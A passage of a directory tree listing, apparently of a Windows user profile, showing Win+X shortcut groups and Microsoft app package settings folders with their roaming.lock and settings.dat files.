&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Group2
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 1 - Run.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 2 - Search.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 3 - Windows Explorer.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 4 - Control Panel.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 5 - Task Manager.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; desktop.ini
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; Group3
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; 01a - Windows PowerShell.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; 01 - Command Prompt.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; 02a - Windows PowerShell.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; 02 - Command Prompt.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; 03 - Computer Management.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; 04-1 - NetworkStatus.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; 04 - Disk Management.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; 05 - Device Manager.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; 06 - SystemAbout.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; 07 - Event Viewer.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; 08 - PowerAndSleep.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; 09 - Mobility Center.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; 10 - AppsAndFeatures.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9492;&#9472;&#9472; desktop.ini
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Windows Sidebar
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.ini
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Packages
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.549981C3F5F10_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat.LOG1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat.LOG2
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat.LOG1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat.LOG2
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.AccountsControl_cw5n1h2txyewy
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.AsyncTextService_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.BingWeather_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat.LOG1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat.LOG2
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.BioEnrollment_cw5n1h2txyewy
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.CredDialogHost_cw5n1h2txyewy
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.DesktopAppInstaller_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.ECApp_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.Edge.GameAssist_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.GetHelp_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.Getstarted_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.HEIFImageExtension_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.LockApp_cw5n1h2txyewy
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat.LOG1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat.LOG2
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.Microsoft3DViewer_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.MicrosoftEdge_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; LocalState
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; PinnedTiles
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; 26310719480
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; squaretile.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; tinytile.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; 38975140460
